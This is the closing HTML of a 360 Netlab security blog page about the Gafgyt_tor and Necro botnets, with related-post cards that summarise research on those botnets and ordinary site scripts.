            <p>Read <a href="/author/jinye/">more posts</a> by this author.</p>
    </section>
</section>
<div class="post-full-footer-right">
    <a class="author-card-button" href="/author/jinye/">Read More</a>
</div>


                </footer>

                <div id="disqus_thread"></div>
                <script>
                    var disqus_config = function () {
                        this.page.url = "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/";
                        this.page.identifier = "ghost-60404a8ad0d9b7000712c12f"
                    };
                    (function () {
                        var d = document, s = d.createElement('script');
                        s.src = 'https://blog-netlab-360.disqus.com/embed.js';
                        s.setAttribute('data-timestamp', +new Date());
                        (d.head || d.body).appendChild(s);
                    })();
                </script>

            </article>

        </div>
    </main>

    <aside class="read-next outer">
        <div class="inner">
            <div class="read-next-feed">
                <article class="read-next-card"   style="background-image: url(https://blog.netlab.360.com/content/images/size/w600/2019/02/astronomy-constellation-dark-998641-4.jpg)"
                     >
                    <header class="read-next-card-header">
                        <small class="read-next-card-header-sitetitle">&mdash; 360 Netlab Blog - Network Security Research Lab at 360 &mdash;</small>
                        <h3 class="read-next-card-header-title"><a href="/tag/necro/">Necro</a></h3>
                    </header>
                    <div class="read-next-divider"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 14.5s2 3 5 3 5.5-2.463 5.5-5.5S21 6.5 18 6.5c-5 0-7 11-12 11C2.962 17.5.5 15.037.5 12S3 6.5 6 6.5s4.5 3.5 4.5 3.5"/></svg>
</div>
                    <div class="read-next-card-content">
                        <ul>
                            <li><a href="/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/">Necro upgrades again, using Tor + dynamic domain DGA and aiming at both Windows &amp; Linux</a></li>
                            <li><a href="/tor-bld/">Gafgtyt_tor，Necro作者再次升级“武器库”</a></li>
                            <li><a href="/necro/">Necro is going to version 3 and using PyInstaller and DGA</a></li>
                        </ul>
                    </div>
                    <footer class="read-next-card-footer">
                        <a href="/tag/necro/">See all 4 posts →</a>
                    </footer>
                </article>

                <article class="post-card post tag-necro tag-necromporph tag-freakout tag-tor tag-ddos tag-gafgyt tag-gafgyt_tor tag-tsunami tag-keksec tag-botnet tag-cve-2019-16920 tag-cve-2019-19781 tag-ak47scan no-image">


    <div class="post-card-content">

        <a class="post-card-content-link" href="/tor-bld/">

            <header class="post-card-header">
                    <span class="post-card-tags">Necro</span>
                <h2 class="post-card-title">Gafgtyt_tor，Necro作者再次升级“武器库”</h2>
            </header>

            <section class="post-card-excerpt">
                <p>版权 版权声明: 本文为Netlab原创，依据CC BY-SA 4.0 许可证进行授权，转载请附上出处链接及本声明。 概述 自2021年2月15号起，360Netlab的BotMon系统持续检测到Gafgyt家族的一个新变种，它使用Tor进行C2通信以隐藏真实C2，并对样本中的敏感字符串做了加密处理。这是我们首次发现使用Tor机制的Gafgyt变种，所以将该变种命名为Gafgyt_tor。进一步分析发现该家族与我们1月份公开的Necro家族有紧密联系，背后为同一伙人，即所谓的keksec团伙[1] [2]。检索历史样本发现该团伙长期运营Linux IoT botnet，除了Necro和Gafgyt_tor，他们还曾运营过Tsunami和其它Gafgyt变种botnet。本文将介绍Gafgyt_tor，并对该团伙近期运营的其它botnet做一梳理。 本文关键点如下： Gafgyt_</p>
            </section>

        </a>

        <footer class="post-card-meta">

            <ul class="author-list">
                <li class="author-list-item">

                    <div class="author-name-tooltip">
                        jinye
                    </div>

                        <a href="/author/jinye/" class="static-avatar">
                            <img class="author-profile-image" src="https://blog.netlab.360.com/content/images/size/w100/2019/12/400--2-.jpeg" alt="jinye" />
                        </a>
                </li>
            </ul>

            <span class="reading-time">15 min read</span>

        </footer>

    </div>

</article>

                <article class="post-card post tag-botnet tag-cve-2020-9020 tag-fbot tag-internet-of-vehicles no-image">


    <div class="post-card-content">

        <a class="post-card-content-link" href="/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/">

            <header class="post-card-header">
                    <span class="post-card-tags">Botnet</span>
                <h2 class="post-card-title">Fbot is now riding the traffic and transportation smart devices</h2>
            </header>

            <section class="post-card-excerpt">
                <p>Background Fbot, a botnet based on Mirai, has been very active ever sine we first blogged about it here[1][2], we have seen this botnet using multiple 0 days before(some of</p>
            </section>

        </a>

        <footer class="post-card-meta">

            <ul class="author-list">
                <li class="author-list-item">

                    <div class="author-name-tooltip">
                        Genshen Ye
                    </div>

                        <a href="/author/yegenshen/" class="static-avatar">
                            <img class="author-profile-image" src="https://blog.netlab.360.com/content/images/size/w100/2017/10/1662072805.jpg" alt="Genshen Ye" />
                        </a>
                </li>
                <li class="author-list-item">

                    <div class="author-name-tooltip">
                        Alex.Turing
                    </div>

                        <a href="/author/alex/" class="static-avatar">
                            <img class="author-profile-image" src="https://blog.netlab.360.com/content/images/size/w100/2019/06/turing.PNG" alt="Alex.Turing" />
                        </a>
                </li>
            </ul>

            <span class="reading-time">5 min read</span>

        </footer>

    </div>

</article>

            </div>
        </div>
    </aside>

    <div class="floating-header">
    <div class="floating-header-logo">
        <a href="https://blog.netlab.360.com">
                <img src="https://blog.netlab.360.com/content/images/size/w30/2019/02/netlab_xs-2.png" alt="360 Netlab Blog - Network Security Research Lab at 360 icon" />
            <span>360 Netlab Blog - Network Security Research Lab at 360</span>
        </a>
    </div>
    <span class="floating-header-divider">&mdash;</span>
    <div class="floating-header-title">Gafgtyt_tor and Necro are on the move again</div>
    <div class="floating-header-share">
        <div class="floating-header-share-label">Share this <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
    <path d="M7.5 15.5V4a1.5 1.5 0 1 1 3 0v4.5h2a1 1 0 0 1 1 1h2a1 1 0 0 1 1 1H18a1.5 1.5 0 0 1 1.5 1.5v3.099c0 .929-.13 1.854-.385 2.748L17.5 23.5h-9c-1.5-2-5.417-8.673-5.417-8.673a1.2 1.2 0 0 1 1.76-1.605L7.5 15.5zm6-6v2m-3-3.5v3.5m6-1v2"/>
</svg>
</div>
        <a class="floating-header-share-tw" href="https://twitter.com/share?text=Gafgtyt_tor%20and%20Necro%20are%20on%20the%20move%20again&amp;url=https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/"
            onclick="window.open(this.href, 'share-twitter', 'width=550,height=235');return false;">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M30.063 7.313c-.813 1.125-1.75 2.125-2.875 2.938v.75c0 1.563-.188 3.125-.688 4.625a15.088 15.088 0 0 1-2.063 4.438c-.875 1.438-2 2.688-3.25 3.813a15.015 15.015 0 0 1-4.625 2.563c-1.813.688-3.75 1-5.75 1-3.25 0-6.188-.875-8.875-2.625.438.063.875.125 1.375.125 2.688 0 5.063-.875 7.188-2.5-1.25 0-2.375-.375-3.375-1.125s-1.688-1.688-2.063-2.875c.438.063.813.125 1.125.125.5 0 1-.063 1.5-.25-1.313-.25-2.438-.938-3.313-1.938a5.673 5.673 0 0 1-1.313-3.688v-.063c.813.438 1.688.688 2.625.688a5.228 5.228 0 0 1-1.875-2c-.5-.875-.688-1.813-.688-2.75 0-1.063.25-2.063.75-2.938 1.438 1.75 3.188 3.188 5.25 4.25s4.313 1.688 6.688 1.813a5.579 5.579 0 0 1 1.5-5.438c1.125-1.125 2.5-1.688 4.125-1.688s3.063.625 4.188 1.813a11.48 11.48 0 0 0 3.688-1.375c-.438 1.375-1.313 2.438-2.563 3.188 1.125-.125 2.188-.438 3.313-.875z"/></svg>
        </a>
        <a class="floating-header-share-fb" href="https://www.facebook.com/sharer/sharer.php?u=https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/"
            onclick="window.open(this.href, 'share-facebook','width=580,height=296');return false;">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><path d="M19 6h5V0h-5c-3.86 0-7 3.14-7 7v3H8v6h4v16h6V16h5l1-6h-6V7c0-.542.458-1 1-1z"/></svg>
        </a>
    </div>
    <progress id="reading-progress" class="progress" value="0">
        <div class="progress-container">
            <span class="progress-bar"></span>
        </div>
    </progress>
</div>




        <footer class="site-footer outer">
            <div class="site-footer-content inner">
                <section class="copyright"><a href="https://blog.netlab.360.com">360 Netlab Blog - Network Security Research Lab at 360</a> &copy; 2021</section>
                <nav class="site-footer-nav">
                    <a href="https://blog.netlab.360.com">Latest Posts</a>
                    
                    <a href="https://twitter.com/360Netlab" target="_blank" rel="noopener">Twitter</a>
                    <a href="https://ghost.org" target="_blank" rel="noopener">Ghost</a>
                </nav>
            </div>
        </footer>

    </div>


    <script>
        var images = document.querySelectorAll('.kg-gallery-image img');
        images.forEach(function (image) {
            var container = image.closest('.kg-gallery-image');
            var width = image.attributes.width.value;
            var height = image.attributes.height.value;
            var ratio = width / height;
            container.style.flex = ratio + ' 1 0%';
        })
    </script>


    <script
        src="https://code.jquery.com/jquery-3.2.1.min.js"
        integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
        crossorigin="anonymous">
    </script>
    <script type="text/javascript" src="/assets/built/jquery.fitvids.js?v=db215a41fd"></script>


        <script>

        // NOTE: Scroll performance is poor in Safari
        // - this appears to be due to the events firing much more slowly in Safari.
        //   Dropping the scroll event and using only a raf loop results in smoother
        //   scrolling but continuous processing even when not scrolling
        $(document).ready(function () {
            // Start fitVids
            var $postContent = $(".post-full-content");
            $postContent.fitVids();
            // End fitVids

            var progressBar = document.querySelector('#reading-progress');
            var header = document.querySelector('.floating-header');
            var title = document.querySelector('.post-full-title');

            var lastScrollY = window.scrollY;
            var lastWindowHeight = window.innerHeight;
            var lastDocumentHeight = $(document).height();
            var ticking = false;

            function onScroll() {
                lastScrollY = window.scrollY;
                requestTick();
            }

            function onResize() {
                lastWindowHeight = window.innerHeight;
                lastDocumentHeight = $(document).height();
                requestTick();
            }

            function requestTick() {
                if (!ticking) {
                    requestAnimationFrame(update);
                }
                ticking = true;
            }

            function update() {
                var trigger = title.getBoundingClientRect().top + window.scrollY;
                var triggerOffset = title.offsetHeight + 35;
                var progressMax = lastDocumentHeight - lastWindowHeight;

                // show/hide floating header
                if (lastScrollY >= trigger + triggerOffset) {
                    header.classList.add('floating-active');
                } else {
                    header.classList.remove('floating-active');
                }

                progressBar.setAttribute('max', progressMax);
                progressBar.setAttribute('value', lastScrollY);

                ticking = false;
            }

            window.addEventListener('scroll', onScroll, { passive: true });
            window.addEventListener('resize', onResize, false);

            update();

        });
    </script>


    

</body>
</html>
